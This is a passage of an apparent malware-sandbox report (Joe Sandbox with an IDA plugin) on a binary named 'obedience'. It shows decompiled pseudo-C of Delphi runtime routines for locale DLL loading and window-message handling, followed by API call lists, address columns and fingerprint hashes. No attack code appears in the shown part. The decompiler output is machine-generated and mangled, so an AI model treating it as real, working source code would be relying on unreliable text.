      										_push(_v32);
      										L00401338();
      										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
      										_t110 = _t94;
      										if(_t110 == 0) {
      											_v15 = 0;
      											_push(0x105 - _v32 -  &_v293);
      											_push( &_v17);
      											_push(_v32);
      											L00401338();
      											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
      											_t110 = _t101;
      										}
      									}
      								}
      							}
      							return _t110;
      						} else {
      							goto L3;
      						}
      					}
      				}
      			}


      APIs
      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0048E0A8), ref: 00406127
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406145
      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0048E0A8), ref: 00406163
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406181
      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004061CA
      • RegQueryValueExA.ADVAPI32(?,0040638C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00406210,?,80000001), ref: 004061E8
      • RegCloseKey.ADVAPI32(?,00406217,00000000,?,?,00000000,00406210,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040620A
      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406227
      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406234
      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040623A
      • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00406265
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062BA
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004062CA
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062F6
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406306
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00406330
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00406340
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
      • API String ID: 1759228003-2375825460
      • Opcode ID: 2efafc2d468421ca2c69aef3762a3f7c81f1f9f2ad4b459394d9ed83abf749a0
      • Instruction ID: 7c224e0b8b07be3a078314fc2ad44a8c4e545e27136a8e3aef4647d0922f16c7
      • Opcode Fuzzy Hash: 2efafc2d468421ca2c69aef3762a3f7c81f1f9f2ad4b459394d9ed83abf749a0
      • Instruction Fuzzy Hash: FE615E71A402097EEB10EAE5CC46FEFB7BC9B18704F4140B6BA05F65C1D6BC9A548B68
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 93%
      			E00463830(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
      				struct HWND__* _v8;
      				struct HWND__* _v12;
      				struct HWND__* _v16;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				signed int _t161;
      				struct HWND__* _t162;
      				struct HWND__* _t163;
      				struct HWND__* _t176;
      				struct HWND__* _t185;
      				struct HWND__* _t188;
      				struct HWND__* _t189;
      				struct HWND__* _t191;
      				struct HWND__* _t197;
      				struct HWND__* _t199;
      				struct HWND__* _t202;
      				struct HWND__* _t205;
      				struct HWND__* _t206;
      				struct HWND__* _t216;
      				struct HWND__* _t217;
      				struct HWND__* _t222;
      				struct HWND__* _t224;
      				struct HWND__* _t227;
      				struct HWND__* _t231;
      				struct HWND__* _t239;
      				struct HWND__* _t247;
      				struct HWND__* _t250;
      				struct HWND__* _t254;
      				struct HWND__* _t256;
      				struct HWND__* _t257;
      				struct HWND__* _t269;
      				intOrPtr _t272;
      				struct HWND__* _t275;
      				intOrPtr* _t276;
      				struct HWND__* _t284;
      				struct HWND__* _t286;
      				struct HWND__* _t297;
      				void* _t305;
      				signed int _t307;
      				struct HWND__* _t312;
      				struct HWND__* _t313;
      				struct HWND__* _t314;
      				void* _t315;
      				intOrPtr _t336;
      				struct HWND__* _t340;
      				intOrPtr _t362;
      				void* _t364;
      				void* _t368;
      				void* _t369;
      				intOrPtr _t370;
      
      				_t315 = __ecx;
      				_v12 = __edx;
      				_v8 = __eax;
      				_push(_t369);
      				_push(0x463ee7);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t370;
      				 *(_v12 + 0xc) = 0;
      				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
      				if(_t305 < 0) {
      					L5:
      					E004636E4(_v8, _t315, _v12);
      					_t307 =  *_v12;
      					_t161 = _t307;
      					__eflags = _t161 - 0x53;
      					if(__eflags > 0) {
      						__eflags = _t161 - 0xb017;
      						if(__eflags > 0) {
      							__eflags = _t161 - 0xb020;
      							if(__eflags > 0) {
      								_t162 = _t161 - 0xb031;
      								__eflags = _t162;
      								if(_t162 == 0) {
      									_t163 = _v12;
      									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
      									if( *((intOrPtr*)(_t163 + 4)) != 1) {
      										 *(_v8 + 0xb0) =  *(_v12 + 8);
      									} else {
      										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
      									}
      									L102:
      									_pop(_t336);
      									 *[fs:eax] = _t336;
      									return 0;
      								}
      								__eflags = _t162 + 0xfffffff2 - 2;
      								if(_t162 + 0xfffffff2 - 2 < 0) {
      									 *(_v12 + 0xc) = E00465A14(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
      								} else {
      									L101:
      									E004637A8(_t369); // executed
      								}
      								goto L102;
      							}
      							if(__eflags == 0) {
      								_t176 = _v12;
      								__eflags =  *(_t176 + 4);
      								if( *(_t176 + 4) != 0) {
      									E00464510(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
      								} else {
      									E004644B4(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
      								}
      								goto L102;
      							}
      							_t185 = _t161 - 0xb01a;
      							__eflags = _t185;
      							if(_t185 == 0) {
      								_t188 = IsIconic( *(_v8 + 0x30));
      								__eflags = _t188;
      								if(_t188 == 0) {
      									_t189 = GetFocus();
      									_t340 = _v8;
      									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
      									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
      										_t191 = E0045B4F4(0);
      										__eflags = _t191;
      										if(_t191 != 0) {
      											SetFocus(_t191);
      										}
      									}
      								}
      								goto L102;
      							}
      							__eflags = _t185 == 5;
      							if(_t185 == 5) {
      								L89:
      								E00464A04(_v8,  *(_v12 + 8),  *(_v12 + 4));
      								goto L102;
      							} else {
      								goto L101;
      							}
      						}
      						if(__eflags == 0) {
      							_t197 =  *(_v8 + 0x44);
      							__eflags = _t197;
      							if(_t197 != 0) {
      								_t365 = _t197;
      								_t199 = E0044B158(_t197);
      								__eflags = _t199;
      								if(_t199 != 0) {
      									_t202 = IsWindowEnabled(E0044B158(_t365));
      									__eflags = _t202;
      									if(_t202 != 0) {
      										_t205 = IsWindowVisible(E0044B158(_t365));
      										__eflags = _t205;
      										if(_t205 != 0) {
      											 *0x48ee24 = 0;
      											_t206 = GetFocus();
      											SetFocus(E0044B158(_t365));
      											E00445AE8(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
      											SetFocus(_t206);
      											 *0x48ee24 = 1;
      											 *(_v12 + 0xc) = 1;
      										}
      									}
      								}
      							}
      							goto L102;
      						}
      						__eflags = _t161 - 0xb000;
      						if(__eflags > 0) {
      							_t216 = _t161 - 0xb001;
      							__eflags = _t216;
      							if(_t216 == 0) {
      								_t217 = _v8;
      								__eflags =  *((short*)(_t217 + 0x10a));
      								if( *((short*)(_t217 + 0x10a)) != 0) {
      									 *((intOrPtr*)(_v8 + 0x108))();
      								}
      								goto L102;
      							}
      							__eflags = _t216 == 0x15;
      							if(_t216 == 0x15) {
      								_t222 = E00464374(_v8, _t315, _v12);
      								__eflags = _t222;
      								if(_t222 != 0) {
      									 *(_v12 + 0xc) = 1;
      								}
      								goto L102;
      							} else {
      								goto L101;
      							}
      						}
      						if(__eflags == 0) {
      							_t224 = _v8;
      							__eflags =  *((short*)(_t224 + 0x112));
      							if( *((short*)(_t224 + 0x112)) != 0) {
      								 *((intOrPtr*)(_v8 + 0x110))();
      							}
      							goto L102;
      						}
      						_t227 = _t161 - 0x112;
      						__eflags = _t227;
      						if(_t227 == 0) {
      							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
      							__eflags = _t231;
      							if(_t231 == 0) {
      								E00463F4C(_v8);
      							} else {
      								__eflags = _t231 == 0x100;
      								if(_t231 == 0x100) {
      									E00463FFC(_v8);
      								} else {
      									E004637A8(_t369);
      								}
      							}
      							goto L102;
      						}
      						_t239 = _t227 + 0xffffffe0 - 7;
      						__eflags = _t239;
      						if(_t239 < 0) {
      							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
      							goto L102;
      						}
      						__eflags = _t239 == 0x1e1;
      						if(_t239 == 0x1e1) {
      							_t247 = E00430EB0(E00430DA8());
      							__eflags = _t247;
      							if(_t247 != 0) {
      								E00430F0C(E00430DA8());
      							}
      							goto L102;
      						} else {
      							goto L101;
      						}
      					}
      					if(__eflags == 0) {
      						goto L89;
      					}
      					__eflags = _t161 - 0x16;
      					if(__eflags > 0) {
      						__eflags = _t161 - 0x1d;
      						if(__eflags > 0) {
      							_t250 = _t161 - 0x37;
      							__eflags = _t250;
      							if(_t250 == 0) {
      								 *(_v12 + 0xc) = E00463F30(_v8);
      								goto L102;
      							}
      							__eflags = _t250 == 0x13;
      							if(_t250 == 0x13) {
      								_t254 = _v12;
      								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
      								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
      									_t256 = _v8;
      									__eflags =  *((char*)(_t256 + 0x9e));
      									if( *((char*)(_t256 + 0x9e)) != 0) {
      										_t257 = _v8;
      										__eflags =  *(_t257 + 0xa0);
      										if( *(_t257 + 0xa0) != 0) {
      											 *(_v12 + 0xc) = 0;
      										} else {
      											_t312 = E0040E8BC("vcltest3.dll", _t307, 0x8000);
      											 *(_v8 + 0xa0) = _t312;
      											__eflags = _t312;
      											if(_t312 == 0) {
      												 *(_v12 + 0xc) = GetLastError();
      												 *(_v8 + 0xa0) = 0;
      											} else {
      												 *(_v12 + 0xc) = 0;
      												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
      												_v16 = _t313;
      												__eflags = _t313;
      												if(_t313 != 0) {
      													_t269 =  *(_v12 + 8);
      													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
      												}
      											}
      										}
      									}
      								}
      								goto L102;
      							} else {
      								goto L101;
      							}
      						}
      						if(__eflags == 0) {
      							_t272 =  *0x490b80; // 0x2480e74
      							E00462CD4(_t272);
      							E004637A8(_t369);
      							goto L102;
      						}
      						_t275 = _t161 - 0x1a;
      						__eflags = _t275;
      						if(_t275 == 0) {
      							_t276 =  *0x48f984; // 0x490adc
      							E0044FB64( *_t276, _t315,  *(_v12 + 4));
      							E0046373C(_v8, _t307, _t315, _v12, _t364);
      							E004637A8(_t369);
      							goto L102;
      						}
      						__eflags = _t275 == 2;
      						if(_t275 == 2) {
      							E004637A8(_t369);
      							_t284 = _v12;
      							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
      							asm("sbb eax, eax");
      							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
      							_t286 = _v12;
      							__eflags =  *(_t286 + 4);
      							if( *(_t286 + 4) == 0) {
      								E00463638();
      								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
      							} else {
      								E00463648(_v8);
      								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
      							}
      							goto L102;
      						} else {
      							goto L101;
      						}
      					}
      					if(__eflags == 0) {
      						_t297 = _v12;
      						__eflags =  *(_t297 + 4);
      						if( *(_t297 + 4) != 0) {
      							E004048C4();
      						}
      						goto L102;
      					}
      					__eflags = _t161 - 0x14;
      					if(_t161 > 0x14) {
      						goto L101;
      					}
      					switch( *((intOrPtr*)(_t161 * 4 +  &M004638D4))) {
      						case 0:
      							0 = E0042202C(0, __ebx, __edi, __esi);
      							goto L102;
      						case 1:
      							goto L101;
      						case 2:
      							_push(0);
      							_push(0);
      							_push(0xb01a);
      							_v8 =  *(_v8 + 0x30);
      							_push( *(_v8 + 0x30));
      							L00407880();
      							__eax = E004637A8(__ebp);
      							goto L102;
      						case 3:
      							__eax = _v12;
      							__eflags =  *(__eax + 4);
      							if( *(__eax + 4) == 0) {
      								__eax = E004637A8(__ebp);
      								__eax = _v8;
      								__eflags =  *(__eax + 0xac);
      								if( *(__eax + 0xac) == 0) {
      									__eax = _v8;
      									__eax =  *(_v8 + 0x30);
      									__eax = E0045B38C( *(_v8 + 0x30), __ebx, __edi, __esi);
      									__edx = _v8;
      									 *(_v8 + 0xac) = __eax;
      								}
      								_v8 = L00463640();
      							} else {
      								_v8 = E00463648(_v8);
      								__eax = _v8;
      								__eax =  *(_v8 + 0xac);
      								__eflags = __eax;
      								if(__eax != 0) {
      									__eax = _v8;
      									__edx = 0;
      									__eflags = 0;
      									 *(_v8 + 0xac) = 0;
      								}
      								__eax = E004637A8(__ebp);
      							}
      							goto L102;
      						case 4:
      							__eax = _v8;
      							__eax =  *(_v8 + 0x30);
      							_push(__eax);
      							L004077D8();
      							__eflags = __eax;
      							if(__eax == 0) {
      								__eax = E004637A8(__ebp);
      							} else {
      								__eax = E004637E4(__ebp);
      							}
      							goto L102;
      						case 5:
      							__eax = _v8;
      							__eax =  *(_v8 + 0x44);
      							__eflags = __eax;
      							if(__eax != 0) {
      								__eax = E00460DD0(__eax, __ecx);
      							}
      							goto L102;
      						case 6:
      							__eax = _v12;
      							 *_v12 = 0x27;
      							__eax = E004637A8(__ebp);
      							goto L102;
      					}
      				} else {
      					_t314 = _t305 + 1;
      					_t368 = 0;
      					do {
      						if( *((intOrPtr*)(E00419C84( *((intOrPtr*)(_v8 + 0xa8)), _t315, _t368)))() != 0) {
      							_pop(_t362);
      							 *[fs:eax] = _t362;
      							return 0;
      						}
      						_t368 = _t368 + 1;
      						_t314 = _t314 - 1;
      						__eflags = _t314;
      					} while (_t314 != 0);
      					goto L5;
      				}
      			}






















































      0x00463830
      0x00463839
      0x0046383c
      0x00463841
      0x00463842
      0x00463847
      0x0046384a
      0x00463852
      0x00463861
      0x00463864
      0x00463898
      0x0046389e
      0x004638a6
      0x004638a8
      0x004638aa
      0x004638ad
      0x00463961
      0x00463966
      0x004639b7
      0x004639bc
      0x004639dd
      0x004639dd
      0x004639e2
      0x00463e4f
      0x00463e52
      0x00463e56
      0x00463e72
      0x00463e58
      0x00463e64
      0x00463e64
      0x00463edd
      0x00463edf
      0x00463ee2
      0x00000000
      0x00463ee2
      0x004639eb
      0x004639ee
      0x00463caa
      0x004639f4
      0x00463ed6
      0x00463ed7
      0x00463edc
      0x00000000
      0x004639ee
      0x004639be
      0x00463e16
      0x00463e19
      0x00463e1d
      0x00463e45
      0x00463e1f
      0x00463e2d
      0x00463e2d
      0x00000000
      0x00463e1d
      0x004639c4
      0x004639c4
      0x004639c9
      0x00463dc4
      0x00463dc9
      0x00463dcb
      0x00463dd1
      0x00463dd6
      0x00463dd9
      0x00463ddc
      0x00463de4
      0x00463de9
      0x00463deb
      0x00463df2
      0x00463df2
      0x00463deb
      0x00463ddc
      0x00000000
      0x00463dcb
      0x004639cf
      0x004639d2
      0x00463dfc
      0x00463e0c
      0x00000000
      0x004639d8
      0x00000000
      0x004639d8
      0x004639d2
      0x00463968
      0x00463cd7
      0x00463cda
      0x00463cdc
      0x00463ce2
      0x00463ce6
      0x00463ceb
      0x00463ced
      0x00463cfb
      0x00463d00
      0x00463d02
      0x00463d10
      0x00463d15
      0x00463d17
      0x00463d1d
      0x00463d24
      0x00463d33
      0x00463d4c
      0x00463d52
      0x00463d57
      0x00463d61
      0x00463d61
      0x00463d17
      0x00463d02
      0x00463ced
      0x00000000
      0x00463cdc
      0x0046396e
      0x00463973
      0x0046399e
      0x0046399e
      0x004639a3
      0x00463d95
      0x00463d98
      0x00463da0
      0x00463db2
      0x00463db2
      0x00000000
      0x00463da0
      0x004639a9
      0x004639ac
      0x00463cb8
      0x00463cbd
      0x00463cbf
      0x00463cc8
      0x00463cc8
      0x00000000
      0x004639b2
      0x00000000
      0x004639b2
      0x004639ac
      0x00463975
      0x00463d6d
      0x00463d70
      0x00463d78
      0x00463d8a
      0x00463d8a
      0x00000000
      0x00463d78
      0x0046397b
      0x0046397b
      0x00463980
      0x00463a04
      0x00463a04
      0x00463a09
      0x00463a17
      0x00463a0b
      0x00463a0b
      0x00463a10
      0x00463a24
      0x00463a12
      0x00463a2f
      0x00463a34
      0x00463a10
      0x00000000
      0x00463a09
      0x00463985
      0x00463985
      0x00463988
      0x00463bbc
      0x00000000
      0x00463bbc
      0x0046398e
      0x00463993
      0x00463eb8
      0x00463ebd
      0x00463ebf
      0x00463ec6
      0x00463ec6
      0x00000000
      0x00463999
      0x00000000
      0x00463999
      0x00463993
      0x004638b3
      0x00000000
      0x00000000
      0x004638b9
      0x004638bc
      0x00463928
      0x0046392b
      0x0046394a
      0x0046394a
      0x0046394d
      0x00463a9a
      0x00000000
      0x00463a9a
      0x00463953
      0x00463956
      0x00463bdb
      0x00463be1
      0x00463be7
      0x00463bed
      0x00463bf0
      0x00463bf7
      0x00463bfd
      0x00463c00
      0x00463c07
      0x00463c89
      0x00463c09
      0x00463c18
      0x00463c1d
      0x00463c23
      0x00463c25
      0x00463c71
      0x00463c79
      0x00463c27
      0x00463c2c
      0x00463c43
      0x00463c45
      0x00463c48
      0x00463c4a
      0x00463c53
      0x00463c61
      0x00463c61
      0x00463c4a
      0x00463c25
      0x00463c07
      0x00463bf7
      0x00000000
      0x0046395c
      0x00000000
      0x0046395c
      0x00463956
      0x0046392d
      0x00463ea0
      0x00463ea5
      0x00463eab
      0x00000000
      0x00463eb0
      0x00463933
      0x00463933
      0x00463936
      0x00463e80
      0x00463e87
      0x00463e92
      0x00463e98
      0x00000000
      0x00463e9d
      0x0046393c
      0x0046393f
      0x00463ac4
      0x00463aca
      0x00463acd
      0x00463ad1
      0x00463ad7
      0x00463add
      0x00463ae0
      0x00463ae4
      0x00463b0b
      0x00463b20
      0x00463ae6
      0x00463ae9
      0x00463afe
      0x00463afe
      0x00000000
      0x00463945
      0x00000000
      0x00463945
      0x0046393f
      0x004638be
      0x00463bc4
      0x00463bc7
      0x00463bcb
      0x00463bd1
      0x00463bd1
      0x00000000
      0x00463bcb
      0x004638c4
      0x004638c7
      0x00000000
      0x00000000
      0x004638cd
      0x00000000
      0x00463ecf
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00463aa2
      0x00463aa4
      0x00463aa6
      0x00463aae
      0x00463ab1
      0x00463ab2
      0x00463ab8
      0x00000000
      0x00000000
      0x00463b2a
      0x00463b2d
      0x00463b31
      0x00463b65
      0x00463b6b
      0x00463b6e
      0x00463b75
      0x00463b77
      0x00463b7a
      0x00463b7d
      0x00463b82
      0x00463b85
      0x00463b85
      0x00463b8e
      0x00463b33
      0x00463b36
      0x00463b3b
      0x00463b3e
      0x00463b44
      0x00463b46
      0x00463b4d
      0x00463b50
      0x00463b50
      0x00463b52
      0x00463b52
      0x00463b59
      0x00463b5e
      0x00000000
      0x00000000
      0x00463a52
      0x00463a55
      0x00463a58
      0x00463a59
      0x00463a5e
      0x00463a60
      0x00463a6f
      0x00463a62
      0x00463a63
      0x00463a68
      0x00000000
      0x00000000
      0x00463a3a
      0x00463a3d
      0x00463a40
      0x00463a42
      0x00463a48
      0x00463a48
      0x00000000
      0x00000000
      0x00463a7a
      0x00463a7d
      0x00463a84
      0x00000000
      0x00000000
      0x00463866
      0x00463866
      0x00463867
      0x00463869
      0x00463885
      0x00463889
      0x0046388c
      0x00000000
      0x0046388c
      0x00463894
      0x00463895
      0x00463895
      0x00463895
      0x00000000
      0x00463869

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID: RegisterAutomation$vcltest3.dll
      • API String ID: 0-2963190186
      • Opcode ID: 2f199dd43e27df91cfbf0b4e877f5457e9b3b45c1ca410db59234ec7ac341d97
      • Instruction ID: db0008a256d7e2fe8af3fe2d649bfad5a66d1a6996f7a6c8094a0fae431877c0
      • Opcode Fuzzy Hash: 2f199dd43e27df91cfbf0b4e877f5457e9b3b45c1ca410db59234ec7ac341d97
      • Instruction Fuzzy Hash: 79E15C35B04288EFDB10DF99C585A5EB7B0AF04316F2485A7E404AB352E739EF41DB1A
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      control_flow_graph 422 406217-406248 lstrcpyn GetThreadLocale GetLocaleInfoA 423 406347-40634d 422->423 424 40624e-406252 422->424 425 406254-406258 424->425 426 40625e-406275 lstrlen 424->426 425->423 425->426 427 40627a-406280 426->427 428 406282-40628b 427->428 429 40628d-406296 427->429 428->429 430 406277 428->430 429->423 431 40629c-4062a3 429->431 430->427 432 4062d1-4062d3 431->432 433 4062a5-4062cf lstrcpyn LoadLibraryExA 431->433 432->423 434 4062d5-4062d9 432->434 433->432 434->423 435 4062db-40630f lstrcpyn LoadLibraryExA 434->435 435->423 436 406311-406345 lstrcpyn LoadLibraryExA 435->436 436->423
      C-Code - Quality: 61%
      			E00406217() {
      				void* _t42;
      				void* _t45;
      				struct HINSTANCE__* _t52;
      				struct HINSTANCE__* _t59;
      				struct HINSTANCE__* _t67;
      				void* _t76;
      
      				_push(0x105);
      				_push( *((intOrPtr*)(_t76 - 4)));
      				_push(_t76 - 0x121);
      				L00401338();
      				GetLocaleInfoA(GetThreadLocale(), 3, _t76 - 0xd, 5); // executed
      				_t67 = 0;
      				if( *(_t76 - 0x121) == 0 ||  *(_t76 - 0xd) == 0 &&  *((char*)(_t76 - 0x12)) == 0) {
      					L14:
      					return _t67;
      				} else {
      					_t42 = _t76 - 0x121;
      					_push(_t42);
      					L00401340();
      					 *((intOrPtr*)(_t76 - 0x1c)) = _t42 + _t76 - 0x121;
      					L5:
      					if( *((char*)( *((intOrPtr*)(_t76 - 0x1c)))) != 0x2e && _t76 - 0x121 !=  *((intOrPtr*)(_t76 - 0x1c))) {
      						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
      						goto L5;
      					}
      					_t45 = _t76 - 0x121;
      					if(_t45 !=  *((intOrPtr*)(_t76 - 0x1c))) {
      						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
      						if( *((char*)(_t76 - 0x12)) != 0) {
      							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t45);
      							_push(_t76 - 0x12);
      							_push( *((intOrPtr*)(_t76 - 0x1c)));
      							L00401338();
      							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
      						}
      						if(_t67 == 0 &&  *(_t76 - 0xd) != 0) {
      							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
      							_push(_t76 - 0xd);
      							_push( *((intOrPtr*)(_t76 - 0x1c)));
      							L00401338();
      							_t52 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
      							_t67 = _t52;
      							if(_t67 == 0) {
      								 *((char*)(_t76 - 0xb)) = 0;
      								_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
      								_push(_t76 - 0xd);
      								_push( *((intOrPtr*)(_t76 - 0x1c)));
      								L00401338();
      								_t59 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
      								_t67 = _t59;
      							}
      						}
      					}
      					goto L14;
      				}
      			}









      0x00406217
      0x0040621f
      0x00406226
      0x00406227
      0x0040623a
      0x0040623f
      0x00406248
      0x00406347
      0x0040634d
      0x0040625e
      0x0040625e
      0x00406264
      0x00406265
      0x00406272
      0x0040627a
      0x00406280
      0x00406277
      0x00000000
      0x00406277
      0x0040628d
      0x00406296
      0x0040629c
      0x004062a3
      0x004062b1
      0x004062b5
      0x004062b9
      0x004062ba
      0x004062cf
      0x004062cf
      0x004062d3
      0x004062ed
      0x004062f1
      0x004062f5
      0x004062f6
      0x00406306
      0x0040630b
      0x0040630f
      0x00406311
      0x00406327
      0x0040632b
      0x0040632f
      0x00406330
      0x00406340
      0x00406345
      0x00406345
      0x0040630f
      0x004062d3
      0x00000000
      0x00406296

      APIs
      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406227
      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406234
      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040623A
      • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00406265
      • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004062BA
      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004062CA
